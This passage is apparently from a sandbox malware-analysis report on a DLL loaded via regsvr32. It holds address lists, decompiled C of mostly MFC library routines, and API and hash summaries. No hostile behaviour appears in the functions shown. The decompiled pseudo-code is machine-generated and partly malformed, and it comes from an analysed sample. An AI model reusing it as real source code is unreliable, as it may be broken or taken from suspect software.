                                                                                                                0x1000a9d0
                                                                                                                0x1000a9d8
                                                                                                                0x1000a9dd
                                                                                                                0x1000a9e8
                                                                                                                0x1000a9ed
                                                                                                                0x1000a9f8
                                                                                                                0x1000a9fd
                                                                                                                0x1000aa08
                                                                                                                0x1000aa0d
                                                                                                                0x1000aa18
                                                                                                                0x1000aa1b
                                                                                                                0x1000aa26
                                                                                                                0x1000aa2b
                                                                                                                0x1000aa2d
                                                                                                                0x1000aa37
                                                                                                                0x1000aa37
                                                                                                                0x1000aa3f
                                                                                                                0x1000aa44
                                                                                                                0x1000aa4f
                                                                                                                0x1000aa54
                                                                                                                0x1000aa5f
                                                                                                                0x1000aa64
                                                                                                                0x1000aa6f
                                                                                                                0x1000aa74
                                                                                                                0x1000aa7f
                                                                                                                0x1000aa84
                                                                                                                0x1000aa8f
                                                                                                                0x1000aa94
                                                                                                                0x1000aa9f
                                                                                                                0x1000aaa4
                                                                                                                0x1000aaaf
                                                                                                                0x1000aab4
                                                                                                                0x1000aabf
                                                                                                                0x1000aac4
                                                                                                                0x1000aacf
                                                                                                                0x1000aad4
                                                                                                                0x1000aadf
                                                                                                                0x1000aae4
                                                                                                                0x1000aaef
                                                                                                                0x1000aaf4
                                                                                                                0x1000aaff
                                                                                                                0x1000ab04
                                                                                                                0x1000ab0f
                                                                                                                0x1000ab14
                                                                                                                0x1000ab1f
                                                                                                                0x1000ab24
                                                                                                                0x1000ab2f
                                                                                                                0x1000ab34
                                                                                                                0x1000ab3f
                                                                                                                0x1000ab44
                                                                                                                0x1000ab4f
                                                                                                                0x1000ab54
                                                                                                                0x1000ab5b
                                                                                                                0x1000ab63
                                                                                                                0x1000ab6c
                                                                                                                0x1000ab78

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7D6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7E6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7F6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A803
                                                                                                                  • Part of subcall function 10020C98: __EH_prolog3.LIBCMT ref: 10020C9F
                                                                                                                  • Part of subcall function 100032E0: ~_Task_impl.LIBCPMT ref: 10003313
                                                                                                                  • Part of subcall function 1000A860: ~_Task_impl.LIBCPMT ref: 1000A896
                                                                                                                  • Part of subcall function 10026B7A: __EH_prolog3.LIBCMT ref: 10026B81
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AA94
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAA4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAB4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAC4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAD4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAE4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAF4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AB04
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AB14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1204490572-0
                                                                                                                • Opcode ID: a7f2ffbca92d85504c22c72b6cf8b1f9b84439077505d18c78f9fe4a6d226f32
                                                                                                                • Instruction ID: ab9487c9aa4a9673fd20d92da6fdb9043eabc56a34cc037b5be037682f10b7c2
                                                                                                                • Opcode Fuzzy Hash: a7f2ffbca92d85504c22c72b6cf8b1f9b84439077505d18c78f9fe4a6d226f32
                                                                                                                • Instruction Fuzzy Hash: 76611B38009B818EE315CB78D5557DABBD0EFAA714F84494CE4EA13282DB74B64DC6B3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035F21 Relevance: 13.6, APIs: 9, Instructions: 130timekeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10035F21(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t91 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100231BA(_t72, _t76, _t84, _t89, _t91);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E1001B075(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E1001BFD0(_t75, _t89, _t85) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t94 = _t75;
					if(_t75 == 0) {
						E1001729E(_t75, _t81, _t85, _t89, _t94);
					}
					_t81 = _t75;
					if(E1001D37F(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E10019C16(_t75, _t81, _t90, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E1001B075(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}


























                                                                                                                0x10035f21
                                                                                                                0x10035f2a
                                                                                                                0x10035f2c
                                                                                                                0x10035f32
                                                                                                                0x10035f35
                                                                                                                0x10036088
                                                                                                                0x10036088
                                                                                                                0x10035f42
                                                                                                                0x10035f48
                                                                                                                0x10035f4b
                                                                                                                0x10035f58
                                                                                                                0x10035f6a
                                                                                                                0x10035f6f
                                                                                                                0x10035f72
                                                                                                                0x10035fde
                                                                                                                0x10035fde
                                                                                                                0x10035fde
                                                                                                                0x10035fe2
                                                                                                                0x10035fec
                                                                                                                0x10036042
                                                                                                                0x10036049
                                                                                                                0x10036053
                                                                                                                0x10036053
                                                                                                                0x1003605b
                                                                                                                0x10036061
                                                                                                                0x10036061
                                                                                                                0x10036069
                                                                                                                0x1003606f
                                                                                                                0x10036075
                                                                                                                0x1003607e
                                                                                                                0x1003607e
                                                                                                                0x10036075
                                                                                                                0x00000000
                                                                                                                0x10036085
                                                                                                                0x10035ff5
                                                                                                                0x10035ffb
                                                                                                                0x10036007
                                                                                                                0x1003600b
                                                                                                                0x10036031
                                                                                                                0x10036031
                                                                                                                0x10036034
                                                                                                                0x10036038
                                                                                                                0x1003603c
                                                                                                                0x10036040
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036040
                                                                                                                0x1003600d
                                                                                                                0x10036012
                                                                                                                0x00000000
                                                                                                                0x10036020
                                                                                                                0x10036023
                                                                                                                0x10036028
                                                                                                                0x1003602a
                                                                                                                0x1003602a
                                                                                                                0x1003602f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003602f
                                                                                                                0x10036012
                                                                                                                0x10035f76
                                                                                                                0x10035f7b
                                                                                                                0x10035f7d
                                                                                                                0x10035f86
                                                                                                                0x10035f9c
                                                                                                                0x10035f9c
                                                                                                                0x00000000
                                                                                                                0x10035f88
                                                                                                                0x10035f88
                                                                                                                0x10035f8a
                                                                                                                0x10035f8c
                                                                                                                0x10035f8c
                                                                                                                0x10035f91
                                                                                                                0x10035f9a
                                                                                                                0x10035fa0
                                                                                                                0x10035fa0
                                                                                                                0x10035fa5
                                                                                                                0x10035fab
                                                                                                                0x10035fa7
                                                                                                                0x10035fa7
                                                                                                                0x10035fa7
                                                                                                                0x10035fb5
                                                                                                                0x10035fbc
                                                                                                                0x10035fc0
                                                                                                                0x10035fc6
                                                                                                                0x10035fc2
                                                                                                                0x10035fc2
                                                                                                                0x10035fc2
                                                                                                                0x10035fcb
                                                                                                                0x10035fd8
                                                                                                                0x10035fd8
                                                                                                                0x10035fcb
                                                                                                                0x00000000
                                                                                                                0x10035fbc
                                                                                                                0x00000000
                                                                                                                0x10035f9a

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000001), ref: 10035F2C
                                                                                                                • GetCursorPos.USER32(?), ref: 10035F4B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10035F58
                                                                                                                • GetCapture.USER32 ref: 10035FAE
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10035FF5
                                                                                                                • WindowFromPoint.USER32 ref: 10036001
                                                                                                                • IsChild.USER32(?,00000000), ref: 10036016
                                                                                                                • KillTimer.USER32 ref: 10036053
                                                                                                                • KillTimer.USER32 ref: 1003606F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327746620-0
                                                                                                                • Opcode ID: 9a79a584eef3040230d5039f7eb7f788dd608f73662f2d0181e765333235b229
                                                                                                                • Instruction ID: 540b38134c8046dac9f729ea4deea094e81d082f0627462e531a61011f967001
                                                                                                                • Opcode Fuzzy Hash: 9a79a584eef3040230d5039f7eb7f788dd608f73662f2d0181e765333235b229
                                                                                                                • Instruction Fuzzy Hash: DA419031600615EFDB22DB64CD49A5E7BB5FF48362F214668E561DB2F1EB32DD418B00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100282D4 Relevance: 13.6, APIs: 9, Instructions: 120windowtimenetworkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E100282D4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t50;
				void* _t54;
				unsigned int _t60;
				unsigned int _t64;
				unsigned int _t66;
				unsigned int _t69;
				signed int _t79;
				intOrPtr _t81;
				void* _t82;
				void* _t83;

				_t83 = __eflags;
				_t77 = __ecx;
				_push(0x3c);
				E1003D219(E10053C55, __ebx, __edi, __esi);
				_t79 = __ecx;
				 *((intOrPtr*)(_t82 - 0x20)) = __ecx;
				_t81 = E100231BA(__ebx, __ecx, __ecx, __esi, _t83);
				 *((intOrPtr*)(_t82 - 0x24)) = _t81;
				 *((intOrPtr*)(_t82 - 0x18)) = 1;
				 *((intOrPtr*)(__ecx + 0xc)) = _t82 - 0x18;
				 *(_t82 - 0x1c) = E10023206();
				_t50 = SetTimer( *(_t81 + 0x2c), 1,  *(__ecx + 8), 0);
				 *(_t82 - 0x28) = _t50;
				if(_t50 == 0) {
					E10023F14(_t77);
				}
				 *(_t82 - 0x14) = 1;
				while( *((intOrPtr*)(_t82 - 0x18)) != 0) {
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					if(PeekMessageA(_t82 - 0x48,  *(_t81 + 0x2c), 0x373, 0x374, 1) == 0) {
						_t60 = PeekMessageA(_t82 - 0x48,  *(_t81 + 0x2c), 0x113, 0x113, 1);
						__eflags = _t60;
						if(_t60 != 0) {
							break;
						}
						__eflags =  *(_t82 - 0x14) - _t60;
						if( *(_t82 - 0x14) == _t60) {
							L24:
							WaitMessage();
							 *(_t82 - 0x14) = 1;
							L25:
							 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
							continue;
						}
						L20:
						_t64 = PeekMessageA(_t82 - 0x48, 0, 0, 0, 0);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L24;
						}
						_t77 = _t79;
						_t66 =  *((intOrPtr*)( *_t79 + 0x40))();
						__eflags = _t66;
						if(_t66 == 0) {
							 *(_t82 - 0x14) =  *(_t82 - 0x14) & 0x00000000;
						} else {
							_t77 =  *(_t82 - 0x1c);
							 *((intOrPtr*)( *( *(_t82 - 0x1c)) + 0x60))(0xffffffff);
						}
						goto L25;
					}
					if( *((intOrPtr*)(_t82 - 0x44)) != 0x373) {
						_t69 =  *(_t82 - 0x3c);
						L14:
						__eflags =  *(_t82 - 0x40);
						if( *(_t82 - 0x40) != 0) {
							L16:
							E100282A2(1, _t77, _t79, _t82,  *((intOrPtr*)(_t82 - 0x44)),  *(_t82 - 0x40), _t69);
							L17:
							 *(_t82 - 0x14) = 1;
							goto L20;
						}
						__eflags = _t69;
						if(_t69 == 0) {
							goto L17;
						}
						goto L16;
					}
					_t69 =  *(_t82 - 0x3c);
					if( *(_t82 - 0x40) !=  *((intOrPtr*)(_t79 + 4))) {
						goto L14;
					}
					if(_t69 == 0x20) {
						break;
					}
					_t77 = _t69 & 0x0000ffff;
					if((_t69 & 0x0000ffff) !=  *((intOrPtr*)(_t82 + 8))) {
						goto L14;
					}
					if( *((intOrPtr*)(_t82 + 8)) == 0x10) {
						 *(_t79 + 0x10) = _t69 >> 0x10;
					}
					break;
				}
				KillTimer( *(_t81 + 0x2c),  *(_t82 - 0x28));
				if( *((intOrPtr*)(_t82 - 0x18)) != 0) {
					 *((intOrPtr*)(_t79 + 0xc)) = 0;
					PostMessageA( *(_t81 + 0x2c), 0x373, 0, 0);
					_t54 = 1;
				} else {
					__imp__#112(0x2714);
					_t54 = 0;
				}
				return E1003D2BE(_t54);
			}













                                                                                                                0x100282d4
                                                                                                                0x100282d4
                                                                                                                0x100282d4
                                                                                                                0x100282db
                                                                                                                0x100282e0
                                                                                                                0x100282e2
                                                                                                                0x100282ea
                                                                                                                0x100282f2
                                                                                                                0x100282f5
                                                                                                                0x100282f8
                                                                                                                0x10028305
                                                                                                                0x1002830c
                                                                                                                0x10028314
                                                                                                                0x10028317
                                                                                                                0x10028319
                                                                                                                0x10028319
                                                                                                                0x1002831e
                                                                                                                0x10028321
                                                                                                                0x10028327
                                                                                                                0x10028345
                                                                                                                0x100283cb
                                                                                                                0x100283d1
                                                                                                                0x100283d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100283d5
                                                                                                                0x100283d8
                                                                                                                0x1002842e
                                                                                                                0x1002842e
                                                                                                                0x10028434
                                                                                                                0x10028437
                                                                                                                0x10028437
                                                                                                                0x00000000
                                                                                                                0x10028437
                                                                                                                0x100283da
                                                                                                                0x100283e4
                                                                                                                0x100283ea
                                                                                                                0x100283ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100283f0
                                                                                                                0x100283f2
                                                                                                                0x100283f5
                                                                                                                0x100283f7
                                                                                                                0x10028405
                                                                                                                0x100283f9
                                                                                                                0x100283f9
                                                                                                                0x10028400
                                                                                                                0x10028400
                                                                                                                0x00000000
                                                                                                                0x100283f7
                                                                                                                0x1002834e
                                                                                                                0x1002839e
                                                                                                                0x100283a1
                                                                                                                0x100283a1
                                                                                                                0x100283a5
                                                                                                                0x100283ab
                                                                                                                0x100283b2
                                                                                                                0x100283b7
                                                                                                                0x100283b7
                                                                                                                0x00000000
                                                                                                                0x100283b7
                                                                                                                0x100283a7
                                                                                                                0x100283a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100283a9
                                                                                                                0x10028356
                                                                                                                0x10028359
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002835f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028361
                                                                                                                0x10028367
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002836d
                                                                                                                0x10028372
                                                                                                                0x10028372
                                                                                                                0x00000000
                                                                                                                0x1002836d
                                                                                                                0x1002837b
                                                                                                                0x10028386
                                                                                                                0x10028447
                                                                                                                0x1002844d
                                                                                                                0x10028453
                                                                                                                0x1002838c
                                                                                                                0x10028391
                                                                                                                0x10028397
                                                                                                                0x10028397
                                                                                                                0x1002845a

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 100282DB
                                                                                                                • SetTimer.USER32(?,00000001,?,00000000), ref: 1002830C
                                                                                                                • PeekMessageA.USER32(?,?,00000373,00000374,00000001), ref: 1002833D
                                                                                                                • KillTimer.USER32 ref: 1002837B
                                                                                                                • WSASetLastError.WS2_32(00002714), ref: 10028391
                                                                                                                  • Part of subcall function 10023F14: __CxxThrowException@8.LIBCMT ref: 10023F28
                                                                                                                • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 100283CB
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100283E4
                                                                                                                • PostMessageA.USER32(?,00000373,00000000,00000000), ref: 1002844D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$Timer$ErrorException@8H_prolog3_catchKillLastPostThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892135707-0
                                                                                                                • Opcode ID: e854fb9c676dcc736765c35c5a51b0ec1f6297546a0ac8a5cc8c7894a8e45a7b
                                                                                                                • Instruction ID: 3ae8f8896b1ab264234c3be0e206ed9fbaa89b696c2c1eaf3d6fda6003435e7d
                                                                                                                • Opcode Fuzzy Hash: e854fb9c676dcc736765c35c5a51b0ec1f6297546a0ac8a5cc8c7894a8e45a7b
                                                                                                                • Instruction Fuzzy Hash: B6412BB590120AEFEB15DFA0EC84AAEBBB8FF08751F904529F955E6190D7309B41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D479 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D479(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1003D219(E100541E3, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E1002D12C(0x10);
						__eflags = _t39;
						if(_t39 == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1005cd8c;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E1002D248( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							if( *(_t65 + 0xc) != 0) {
								_t41 = E10001710(_t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E10001710(_t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1001726A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E1003BB70(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E1003D2BE(_t36);
			}














                                                                                                                0x1002d479
                                                                                                                0x1002d480
                                                                                                                0x1002d485
                                                                                                                0x1002d487
                                                                                                                0x1002d48a
                                                                                                                0x1002d48e
                                                                                                                0x1002d491
                                                                                                                0x1002d497
                                                                                                                0x1002d49e
                                                                                                                0x1002d59f
                                                                                                                0x1002d4ad
                                                                                                                0x1002d4b5
                                                                                                                0x1002d4b9
                                                                                                                0x1002d4ed
                                                                                                                0x1002d4f0
                                                                                                                0x1002d4f5
                                                                                                                0x1002d4f7
                                                                                                                0x1002d503
                                                                                                                0x1002d503
                                                                                                                0x1002d4f9
                                                                                                                0x1002d4f9
                                                                                                                0x1002d4ff
                                                                                                                0x1002d4ff
                                                                                                                0x1002d505
                                                                                                                0x1002d50d
                                                                                                                0x1002d510
                                                                                                                0x1002d513
                                                                                                                0x00000000
                                                                                                                0x1002d4bb
                                                                                                                0x1002d4bb
                                                                                                                0x1002d4c1
                                                                                                                0x1002d4d0
                                                                                                                0x1002d4d3
                                                                                                                0x1002d537
                                                                                                                0x1002d53d
                                                                                                                0x1002d542
                                                                                                                0x1002d4d5
                                                                                                                0x1002d4da
                                                                                                                0x1002d4e0
                                                                                                                0x1002d4e3
                                                                                                                0x1002d4e3
                                                                                                                0x1002d548
                                                                                                                0x1002d54a
                                                                                                                0x1002d54f
                                                                                                                0x1002d555
                                                                                                                0x1002d555
                                                                                                                0x1002d55d
                                                                                                                0x1002d56e
                                                                                                                0x1002d57a
                                                                                                                0x1002d57f
                                                                                                                0x1002d585
                                                                                                                0x1002d585
                                                                                                                0x1002d4c1
                                                                                                                0x1002d588
                                                                                                                0x1002d58d
                                                                                                                0x1002d597
                                                                                                                0x1002d597
                                                                                                                0x1002d59a
                                                                                                                0x1002d59a
                                                                                                                0x1002d5a0
                                                                                                                0x1002d5ab

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002D480
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000010,1002D71C,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D491
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002D4AF
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D4E3
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D54F
                                                                                                                • _memset.LIBCMT ref: 1002D56E
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D57F
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D5A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1891723912-0
                                                                                                                • Opcode ID: 49b338b92619fade77d70dedc170786a1666143629ac4fcdb68aaedf6b34e4d1
                                                                                                                • Instruction ID: b40f346a6f8e9777c4ee9c883b3a874f6e5d7ea1f702c753eedd98a8b764235f
                                                                                                                • Opcode Fuzzy Hash: 49b338b92619fade77d70dedc170786a1666143629ac4fcdb68aaedf6b34e4d1
                                                                                                                • Instruction Fuzzy Hash: 3C317E74400A26EFD710EF60EC8595ABBB4FF08354B61C62AF91697561CB71BE90CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013270 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10013270(void* __ecx) {
				long _t18;
				void* _t38;
				void* _t52;

				_t52 = __ecx;
				_t18 = SendMessageA( *(__ecx + 0x1f8), 0xf0, 0, 0);
				_t38 = _t52 + 0x184;
				if(_t18 == 0) {
					E1001D39A(_t38, 0);
					E1001D39A(_t52 + 0x130, 0);
					E1001D39A(_t52 + 0xdc, 0);
					E1001D39A(_t52 + 0x88, 0);
					SendMessageA( *(_t52 + 0x1a4), 0xf1, 0, 0);
					SendMessageA( *(_t52 + 0x150), 0xf1, 0, 0);
					SendMessageA( *(_t52 + 0xfc), 0xf1, 0, 0);
					return SendMessageA( *(_t52 + 0xa8), 0xf1, 0, 0);
				} else {
					E1001D39A(_t38, 1);
					E1001D39A(_t52 + 0x130, 1);
					E1001D39A(_t52 + 0xdc, 1);
					E1001D39A(_t52 + 0x88, 1);
					SendMessageA( *(_t52 + 0x1a4), 0xf1, 0, 0);
					SendMessageA( *(_t52 + 0x150), 0xf1, 0, 0);
					SendMessageA( *(_t52 + 0xfc), 0xf1, 0, 0);
					return SendMessageA( *(_t52 + 0xa8), 0xf1, 0, 0);
				}
			}






                                                                                                                0x1001327c
                                                                                                                0x1001328a
